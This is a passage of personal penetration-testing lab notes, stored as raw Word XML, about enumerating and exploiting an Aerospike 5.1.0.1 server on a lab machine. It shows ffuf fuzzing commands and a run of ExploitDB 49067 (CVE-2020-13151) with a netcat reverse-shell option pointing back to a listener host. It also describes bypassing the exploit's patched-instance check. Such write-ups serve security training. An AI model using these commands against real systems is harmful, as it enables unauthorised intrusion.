    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u</w:t>
      </w:r>
      <w:hyperlink r:id="rId1226">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1227">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.183.143:80/FUZZ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt -fc 403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf the entire site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u</w:t>
      </w:r>
      <w:hyperlink r:id="rId1228">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1229">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.183.143:80/api/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fc 403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf API endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See heartbeat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to heartbeat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003870">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="948"/>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089400" cy="2692400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="265" name="image289.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image289.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1230"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="40894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3871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See aerospike is running. However, there is no version number here. HOWEVER, if you look at searchsploit, there is only one aerospike exploit so we were assumed to have try it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003872">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The other way to find out about aerospike (including version) was to enumerate the suspicious ports 3000 and 3003 that were open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003873">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For port 3003, you can use telnet to connect, and then try random commands like "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">help</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to find out more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="948"/>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787900" cy="2222500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70" name="image67.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image67.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1231"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="47879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3875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, I ran "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" but it did nothing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003876">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then I ran "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">help</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" which showed all the commands I can use</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003877">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>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color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">menu</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" would be another good one to try</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003878">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then I ran version, which showed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aerospike 5.1.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003879">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Ok now that we know to try Aerospike exploit, I just used the one I found from searchsploit which was ExploitDB 49067</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000387A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can look at it here</w:t>
      </w:r>
      <w:hyperlink r:id="rId1232">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1233">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49067</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000387B">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I downloaded it as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000387C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="94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searchsploit -m 49067</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000387D">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When I first ran it, to try and get the usage information, I got this error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000387E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="94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546600" cy="1282700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="91" name="image103.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image103.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1234"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4546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387F">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I then tried this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003880">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install aerospike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003881">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But this gives me the classic pip error. But I searched it up, and you can add the  --break-system-packages to get it to work. I added this to my notes since I've always had to use pipx instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="948"/>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pip3 install aerospike --break-system-packages</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003883">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This finally worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003884">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And then I ran this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003885">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="94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 49067.py --ahost=192.168.183.143 --aport=3000 --netcatshell --lhost=192.168.45.232 --lport=4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003886">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, then I got an error saying that "this instance is patched."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003887">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But, we already know that our version is not patched, so I went inside the python code and disabled the check. I found the "exit" code, and just replaced it with "return" so that it wouldn't exit the code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003888">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="94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470400" cy="2044700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="159" name="image158.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image158.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1235"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="44704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3889">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And then I got another error, saying that poc.lua was missing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000388A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="94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2616200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="222" name="image223.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image223.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123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388B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then I searched up poc.lua, found a github repo that mentioned the same CVE, and it had a file called poc.lua, so I made sure to download it in the same directory as my exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000388C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1237">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/b4ny4n/CVE-2020-13151</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000388D">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And then I ran the code, and it seemed to work, but my shell was not coming back!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000388E">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So then, I tried a different port instead of 4444. I tried 80.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000388F">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And it worked!!! Finally!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003890">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I saw on discord some people had to increase the time-out length in the exploit. And also, some people had to revert machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003891">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003892">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003893">
      <w:pPr>
